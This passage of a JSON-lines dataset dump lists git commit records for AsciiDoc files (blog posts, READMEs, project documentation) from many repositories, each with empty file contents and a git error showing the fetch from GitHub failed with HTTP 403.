2015-03-23-Enhancing-HubPress-Documentation.adoc","repos":"luckypoem\/blog.hubpress.io,HubPress\/blog.hubpress.io,HubPress\/blog.hubpress.io,HubPress\/blog.hubpress.io,HubPress\/blog.hubpress.io,luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io","old_file":"_posts\/2015-03-23-Enhancing-HubPress-Documentation.adoc","new_file":"_posts\/2015-03-23-Enhancing-HubPress-Documentation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/HubPress\/blog.hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f69aeb7d0d84681c13a2f78017bbc825ae1b1c50","subject":"Update 2015-06-01-My-lodashunderscorejs-Cheatsheet.adoc","message":"Update 2015-06-01-My-lodashunderscorejs-Cheatsheet.adoc","repos":"YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io","old_file":"_posts\/2015-06-01-My-lodashunderscorejs-Cheatsheet.adoc","new_file":"_posts\/2015-06-01-My-lodashunderscorejs-Cheatsheet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/YannBertrand\/yannbertrand.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"82c63e6d49c5bffda94eee5194a3ffca5c82db98","subject":"Update 2016-01-05-Letter-to-My-Eight-Year-Old-Self.adoc","message":"Update 2016-01-05-Letter-to-My-Eight-Year-Old-Self.adoc","repos":"blackGirlsCode\/blog,blackGirlsCode\/blog,blackGirlsCode\/blog","old_file":"_posts\/2016-01-05-Letter-to-My-Eight-Year-Old-Self.adoc","new_file":"_posts\/2016-01-05-Letter-to-My-Eight-Year-Old-Self.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blackGirlsCode\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"78f453b90e3083e46696c70421692e84867f76d9","subject":"Update 2017-07-30-Raspberry-Pi-wireless-access-point-an-approach.adoc","message":"Update 2017-07-30-Raspberry-Pi-wireless-access-point-an-approach.adoc","repos":"manelvf\/blog,manelvf\/blog,manelvf\/blog,manelvf\/blog","old_file":"_posts\/2017-07-30-Raspberry-Pi-wireless-access-point-an-approach.adoc","new_file":"_posts\/2017-07-30-Raspberry-Pi-wireless-access-point-an-approach.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/manelvf\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3466c3d6f179916db10096139f0582a3984484b4","subject":"Update 2015-02-15-Eclipse-Tips-001-raccourcir-le-temps-de-lancement.adoc","message":"Update 2015-02-15-Eclipse-Tips-001-raccourcir-le-temps-de-lancement.adoc","repos":"jabby\/jabby.github.io,jabby\/jabby.github.io,jabby\/jabby.github.io","old_file":"_posts\/2015-02-15-Eclipse-Tips-001-raccourcir-le-temps-de-lancement.adoc","new_file":"_posts\/2015-02-15-Eclipse-Tips-001-raccourcir-le-temps-de-lancement.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jabby\/jabby.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b3d22c8309c1186206281529b73a762f95f44285","subject":"Naming","message":"Naming\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course,oliviercailloux\/jee","old_file":"Best practices\/Maven.adoc","new_file":"Best 
practices\/Maven.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2488e737ad8f583c785c2a31f4dc0fadf37a5a13","subject":"add news item about new site","message":"add news item about new site\n","repos":"clojure\/clojure-site","old_file":"content\/news\/2016\/01\/14\/clojure-org-live.adoc","new_file":"content\/news\/2016\/01\/14\/clojure-org-live.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"4c3f9a0b241fd1494d435d39cf533e1294292f7f","subject":"Update 2015-06-04-3d-Prirazlomnaya-Making-Of.adoc","message":"Update 2015-06-04-3d-Prirazlomnaya-Making-Of.adoc","repos":"Sth0nian\/hubpress.io,Sth0nian\/hubpress.io,Sth0nian\/hubpress.io","old_file":"_posts\/2015-06-04-3d-Prirazlomnaya-Making-Of.adoc","new_file":"_posts\/2015-06-04-3d-Prirazlomnaya-Making-Of.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Sth0nian\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5bbd3ca52d3bade43891855a1571f1a4e4f14e37","subject":"Update 2019-05-29-Could-you-find-some-chains.adoc","message":"Update 2019-05-29-Could-you-find-some-chains.adoc","repos":"dsp25no\/blog.dsp25no.ru,dsp25no\/blog.dsp25no.ru,dsp25no\/blog.dsp25no.ru,dsp25no\/blog.dsp25no.ru","old_file":"_posts\/2019-05-29-Could-you-find-some-chains.adoc","new_file":"_posts\/2019-05-29-Could-you-find-some-chains.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dsp25no\/blog.dsp25no.ru.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f6c3eb8074d9965851fd19052a0f4528ef09a120","subject":"add first draft of cache comparison","message":"add first draft of cache comparison\n","repos":"cache2k\/cache2k,cache2k\/cache2k,cache2k\/cache2k","old_file":"documentation\/src\/docs\/asciidoc\/user-guide\/sections\/_comparison.adoc","new_file":"documentation\/src\/docs\/asciidoc\/user-guide\/sections\/_comparison.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cache2k\/cache2k.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7f99b25cc0ea5fb51019bdad8775b7741ea7e13f","subject":"Update 2017-07-24-full-text-search-by-mongodb-and-elasticsearch.adoc","message":"Update 2017-07-24-full-text-search-by-mongodb-and-elasticsearch.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-24-full-text-search-by-mongodb-and-elasticsearch.adoc","new_file":"_posts\/2017-07-24-full-text-search-by-mongodb-and-elasticsearch.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1d2c51979fbf3d53f7c842344dd8f9a0ceef43b6","subject":"Publish 1993-11-17.adoc","message":"Publish 
1993-11-17.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"1993-11-17.adoc","new_file":"1993-11-17.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2ce380d0115b396af7ec4d689c76831d36e50781","subject":"add system packages","message":"add system packages\n","repos":"ttroy50\/cmake-examples,ttroy50\/cmake-examples,ttroy50\/cmake-examples","old_file":"07-package-management\/A-using-system-provide-packages\/README.adoc","new_file":"07-package-management\/A-using-system-provide-packages\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ttroy50\/cmake-examples.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"55e903056e40322fceaf30d4199f4349c75b6702","subject":"doc: users: add TM example","message":"doc: users: add TM example\n\nSigned-off-by: Mike Holmes <ed44c09f4d7f698f5510adc894a872c73e08c8bd@linaro.org>\nReviewed-by: Bill Fischofer <52f3c909d51cc5d355a68a403df6906b3c1a8f83@linaro.org>\nSigned-off-by: Maxim Uvarov <db4d16e02ae2d7493db430203537da8b2e34f290@linaro.org>\n","repos":"nmorey\/odp,erachmi\/odp,ravineet-singh\/odp,dkrot\/odp,nmorey\/odp,nmorey\/odp,erachmi\/odp,mike-holmes-linaro\/odp,ravineet-singh\/odp,erachmi\/odp,dkrot\/odp,erachmi\/odp,mike-holmes-linaro\/odp,dkrot\/odp,mike-holmes-linaro\/odp,mike-holmes-linaro\/odp,ravineet-singh\/odp,dkrot\/odp,ravineet-singh\/odp,nmorey\/odp","old_file":"doc\/users-guide\/users-guide-tm.adoc","new_file":"doc\/users-guide\/users-guide-tm.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nmorey\/odp.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"fe40174e577e583951983e8db75f6e8496558035","subject":"Update 2016-03-20-Douleurs-extremes-a-latterrissage-en-avion.adoc","message":"Update 2016-03-20-Douleurs-extremes-a-latterrissage-en-avion.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-20-Douleurs-extremes-a-latterrissage-en-avion.adoc","new_file":"_posts\/2016-03-20-Douleurs-extremes-a-latterrissage-en-avion.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"39c1dd085a7217a4233f1abee442e80c216e1fd5","subject":"[DOCS] Added link to security commands","message":"[DOCS] Added link to security commands\n\nOriginal commit: 
elastic\/x-pack-elasticsearch@168167517ba22aae73955690db552350e1eb67d7\n","repos":"gingerwizard\/elasticsearch,uschindler\/elasticsearch,nknize\/elasticsearch,nknize\/elasticsearch,robin13\/elasticsearch,uschindler\/elasticsearch,coding0011\/elasticsearch,scorpionvicky\/elasticsearch,coding0011\/elasticsearch,HonzaKral\/elasticsearch,HonzaKral\/elasticsearch,gingerwizard\/elasticsearch,HonzaKral\/elasticsearch,nknize\/elasticsearch,gfyoung\/elasticsearch,gfyoung\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,robin13\/elasticsearch,gfyoung\/elasticsearch,coding0011\/elasticsearch,GlenRSmith\/elasticsearch,gfyoung\/elasticsearch,GlenRSmith\/elasticsearch,gingerwizard\/elasticsearch,robin13\/elasticsearch,uschindler\/elasticsearch,robin13\/elasticsearch,scorpionvicky\/elasticsearch,scorpionvicky\/elasticsearch,gfyoung\/elasticsearch,uschindler\/elasticsearch,scorpionvicky\/elasticsearch,nknize\/elasticsearch,coding0011\/elasticsearch,coding0011\/elasticsearch,gingerwizard\/elasticsearch,uschindler\/elasticsearch,GlenRSmith\/elasticsearch,robin13\/elasticsearch,HonzaKral\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,GlenRSmith\/elasticsearch","old_file":"docs\/en\/security\/reference.asciidoc","new_file":"docs\/en\/security\/reference.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scorpionvicky\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7903ecc207ca9e784d7c964925ad2f6b074900b8","subject":"Update 2017-07-07-Gameplay-Mah-Rocks.adoc","message":"Update 2017-07-07-Gameplay-Mah-Rocks.adoc","repos":"mahrocks\/mahrocks.github.io,mahrocks\/mahrocks.github.io,mahrocks\/mahrocks.github.io,mahrocks\/mahrocks.github.io","old_file":"_posts\/2017-07-07-Gameplay-Mah-Rocks.adoc","new_file":"_posts\/2017-07-07-Gameplay-Mah-Rocks.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mahrocks\/mahrocks.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a9a3c122f5327d94efb60fb0a7f07226977415c4","subject":"added xml file snippet in docs","message":"added xml file snippet in docs\n","repos":"neo4j-contrib\/neo4j-apoc-procedures,inserpio\/neo4j-apoc-procedures,atuljangra\/neo4j-apoc-procedures,neo4j-contrib\/neo4j-apoc-procedures,neo4j-contrib\/neo4j-apoc-procedures,larusba\/neo4j-apoc-procedures,lilianaziolek\/neo4j-apoc-procedures,neo4j-contrib\/neo4j-apoc-procedures,larusba\/neo4j-apoc-procedures","old_file":"docs\/loadxml.adoc","new_file":"docs\/loadxml.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/inserpio\/neo4j-apoc-procedures.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"60cae2f0db2936f370fb45249568cb3ea3c4f317","subject":"y2b create post BlackBerry Playbook Unboxing","message":"y2b create post BlackBerry Playbook Unboxing","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-04-19-BlackBerry-Playbook-Unboxing.adoc","new_file":"_posts\/2011-04-19-BlackBerry-Playbook-Unboxing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f6a6383631f975e8587cb0cefa657489abfc30a2","subject":"Update 2018-05-02-Azure-11.adoc","message":"Update 2018-05-02-Azure-11.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-05-02-Azure-11.adoc","new_file":"_posts\/2018-05-02-Azure-11.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e6aaf4a0a8b0f86fe8d615f0efb2b0c113345662","subject":"Update Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","message":"Update Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","new_file":"_posts\/Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f80a8f3e4b22347603b7d234b1edb02a05acb3b7","subject":"Update 2017-07-15-why-we-must-organize2.adoc","message":"Update 2017-07-15-why-we-must-organize2.adoc","repos":"TheStudentsOutpost\/TheStudentsOutpost.github.io,TheStudentsOutpost\/TheStudentsOutpost.github.io,TheStudentsOutpost\/TheStudentsOutpost.github.io,TheStudentsOutpost\/TheStudentsOutpost.github.io","old_file":"_posts\/2017-07-15-why-we-must-organize2.adoc","new_file":"_posts\/2017-07-15-why-we-must-organize2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TheStudentsOutpost\/TheStudentsOutpost.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"35ece479cb5186a4c7e6aef1e18bc36de3006369","subject":"Update 2017-09-30-Matrix-Layer-Rotation.adoc","message":"Update 2017-09-30-Matrix-Layer-Rotation.adoc","repos":"JithinPavithran\/JithinPavithran.github.io,JithinPavithran\/JithinPavithran.github.io,JithinPavithran\/JithinPavithran.github.io,JithinPavithran\/JithinPavithran.github.io","old_file":"_posts\/2017-09-30-Matrix-Layer-Rotation.adoc","new_file":"_posts\/2017-09-30-Matrix-Layer-Rotation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/JithinPavithran\/JithinPavithran.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fec8b34f122c94d9a462b55af15a956579b4baa3","subject":"Update 404.adoc","message":"Update 404.adoc","repos":"rorosaurus\/hubpress.io,rorosaurus\/hubpress.io,rorosaurus\/hubpress.io,rorosaurus\/hubpress.io","old_file":"_posts\/404.adoc","new_file":"_posts\/404.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rorosaurus\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7d08651694c18d39ea3f04f2d0ba646dd0edf6a9","subject":"Python: install NymPy and Scipy","message":"Python: 
install NymPy and Scipy\n","repos":"cmpitg\/programming-language-notes","old_file":"Python.adoc","new_file":"Python.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"a937c51976a81985e84f7b1700de9baf084183f1","subject":"Now hosted on GitLab","message":"Now hosted on GitLab\n\nSigned-off-by: Sebastian Davids <ad054bf4072605cd37d196cd013ffd05b05c77ca@gmx.de>\n","repos":"sdavids\/sdavids-commons-test,sdavids\/sdavids-commons-test","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sdavids\/sdavids-commons-test.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"270d0f5219f62fde30a2eb8338e6aae27389f30e","subject":"README: Use an external resource for Git commit message formating.","message":"README: Use an external resource for Git commit message formating.\n\nThis section was rather bulky. I have my doubts of people using it\nfor reference, but I'd rather have it here than not at all.\n","repos":"CWolfRU\/freedoom,CWolfRU\/freedoom","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/CWolfRU\/freedoom.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"21830e815d82384e3519905e25ca3631541fec59","subject":"readme","message":"readme\n","repos":"katheris\/microprofile-conference,karianna\/microprofile-conference,katheris\/microprofile-conference,AndyGee\/microprofile-conference,microprofile\/microprofile-conference,iainduncani\/microprofile-conference,katheris\/microprofile-conference,katheris\/microprofile-conference,katheris\/microprofile-conference,karianna\/microprofile-conference,iainduncani\/microprofile-conference,AndyGee\/microprofile-conference,microprofile\/microprofile-conference,AndyGee\/microprofile-conference,iainduncani\/microprofile-conference,karianna\/microprofile-conference,iainduncani\/microprofile-conference,iainduncani\/microprofile-conference,AndyGee\/microprofile-conference,microprofile\/microprofile-conference,microprofile\/microprofile-conference,AndyGee\/microprofile-conference,karianna\/microprofile-conference,karianna\/microprofile-conference,microprofile\/microprofile-conference","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/AndyGee\/microprofile-conference.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a621de2d50c1fa42a019a3104574493e1c15043e","subject":"Update README","message":"Update README\n","repos":"pjanouch\/ell","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pjanouch\/ell.git\/': The requested URL returned error: 403\n","license":"isc","lang":"AsciiDoc"} {"commit":"bc0480566985a4eb4005f4dc8a7ba3d82fe153a2","subject":"Updated documentation","message":"Updated 
documentation","repos":"storozhukBM\/javaslang-circuitbreaker,resilience4j\/resilience4j,javaslang\/javaslang-circuitbreaker,resilience4j\/resilience4j,goldobin\/resilience4j,mehtabsinghmann\/resilience4j,RobWin\/circuitbreaker-java8,drmaas\/resilience4j,drmaas\/resilience4j,RobWin\/javaslang-circuitbreaker","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/resilience4j\/resilience4j.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"cdd74f66dcd7e49a984bc04531a4011f59dfff18","subject":"Add note to README","message":"Add note to README\n\nSigned-off-by: Alexandre Montplaisir <0b9d8e7da097b5bbfe36e48cca5acfe475f18227@efficios.com>\n","repos":"lttng\/lttng-scope,alexmonthy\/lttng-scope,lttng\/lttng-scope,lttng\/lttng-scope,alexmonthy\/lttng-scope,lttng\/lttng-scope,alexmonthy\/lttng-scope","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lttng\/lttng-scope.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"12ec18ebc43fc79ee8efeebf86d57fd599a2fd6b","subject":"Add .adoc symlink for Github.","message":"Add .adoc symlink for Github.\n","repos":"Yubico\/yubikey-manager,Yubico\/yubikey-manager","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Yubico\/yubikey-manager.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"647528594b4051f2cd068131a52f66549d5e1539","subject":"Update 2015-09-17-first-commit.adoc","message":"Update 2015-09-17-first-commit.adoc","repos":"popurax\/popurax.github.io,popurax\/popurax.github.io,popurax\/popurax.github.io","old_file":"_posts\/2015-09-17-first-commit.adoc","new_file":"_posts\/2015-09-17-first-commit.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/popurax\/popurax.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"476284c155dca4997e324a9eb9d6c4d2248ccd1a","subject":"y2b create post Corsair Vengeance M90 Unboxing (Gaming Mouse - UGPC 2012)","message":"y2b create post Corsair Vengeance M90 Unboxing (Gaming Mouse - UGPC 2012)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-08-09-Corsair-Vengeance-M90-Unboxing-Gaming-Mouse--UGPC-2012.adoc","new_file":"_posts\/2012-08-09-Corsair-Vengeance-M90-Unboxing-Gaming-Mouse--UGPC-2012.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1e5d19f37eb2e351a6edaf04c1049666bc7fa22c","subject":"Update 2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","message":"Update 
2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","new_file":"_posts\/2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"17144979c418ed629c9893df5087c637c70110a2","subject":"Update 2015-04-29-Test.adoc","message":"Update 2015-04-29-Test.adoc","repos":"KurtStam\/kurtstam.github.io,KurtStam\/kurtstam.github.io,KurtStam\/kurtstam.github.io","old_file":"_posts\/2015-04-29-Test.adoc","new_file":"_posts\/2015-04-29-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/KurtStam\/kurtstam.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8bd930601562f55186360ceb7ba464015de56187","subject":"Update 2015-08-19-Test.adoc","message":"Update 2015-08-19-Test.adoc","repos":"jiashengc\/blog,jiashengc\/blog,jiashengc\/blog","old_file":"_posts\/2015-08-19-Test.adoc","new_file":"_posts\/2015-08-19-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jiashengc\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dd1988396a62d728c080129c2add00bb0e0abd85","subject":"Update 2015-01-31-first-title.adoc","message":"Update 2015-01-31-first-title.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2015-01-31-first-title.adoc","new_file":"_posts\/2015-01-31-first-title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c940b138f0e4dff5b8ecb9b5d7579e67f41baafe","subject":"Update 2017-02-17-jquery-xxxx.adoc","message":"Update 2017-02-17-jquery-xxxx.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-02-17-jquery-xxxx.adoc","new_file":"_posts\/2017-02-17-jquery-xxxx.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"553eb2d0e3cf5c6b1557288e5662bffbf3df5c2d","subject":"Worked on documentation.","message":"Worked on documentation.\n","repos":"libyal\/winreg-kb,libyal\/winreg-kb","old_file":"documentation\/SysCache.asciidoc","new_file":"documentation\/SysCache.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/libyal\/winreg-kb.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"65f2cd348dc8b56caf63629734c2443f82135651","subject":"moved the arch doc under docs","message":"moved the arch doc under 
docs\n","repos":"AsherBond\/gluster-site,AsherBond\/gluster-site,AsherBond\/gluster-site","old_file":"documentation\/architecture.adoc","new_file":"documentation\/architecture.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/AsherBond\/gluster-site.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ed0f33d8eca9e120e0966de270284c0190d2c1ec","subject":"Update 2016-06-24-mintia-and-frisk-by-arduino.adoc","message":"Update 2016-06-24-mintia-and-frisk-by-arduino.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-06-24-mintia-and-frisk-by-arduino.adoc","new_file":"_posts\/2016-06-24-mintia-and-frisk-by-arduino.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"151c3f2957deab80335ce78cba5948005552787f","subject":"asciidoc sample document","message":"asciidoc sample document\n","repos":"AvaloniaUI\/AvaloniaEdit,AvaloniaUI\/AvaloniaEdit,AvaloniaUI\/AvaloniaEdit,AvaloniaUI\/AvaloniaEdit,AvaloniaUI\/AvaloniaEdit,AvaloniaUI\/AvaloniaEdit,AvaloniaUI\/AvaloniaEdit,AvaloniaUI\/AvaloniaEdit,AvaloniaUI\/AvaloniaEdit,AvaloniaUI\/AvaloniaEdit,AvaloniaUI\/AvaloniaEdit,AvaloniaUI\/AvaloniaEdit,AvaloniaUI\/AvaloniaEdit,AvaloniaUI\/AvaloniaEdit,AvaloniaUI\/AvaloniaEdit","old_file":"src\/AvaloniaEdit.Demo\/Resources\/SampleFiles\/document.adoc","new_file":"src\/AvaloniaEdit.Demo\/Resources\/SampleFiles\/document.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/AvaloniaUI\/AvaloniaEdit.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e14fb954dd11cacc7864d0cfc3cd484f0470a2f3","subject":"Release 1.4.0","message":"Release 1.4.0\n","repos":"hibersap\/hibersap.github.io","old_file":"news\/2019-10-29-hibersap-1-4-0-released.adoc","new_file":"news\/2019-10-29-hibersap-1-4-0-released.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hibersap\/hibersap.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f84800ffd435e5f06b5cd9a9e0bc0ddd310c3a8d","subject":"1760 add phatomjs intall in the technical-manual.adoc","message":"1760 add phatomjs intall in the 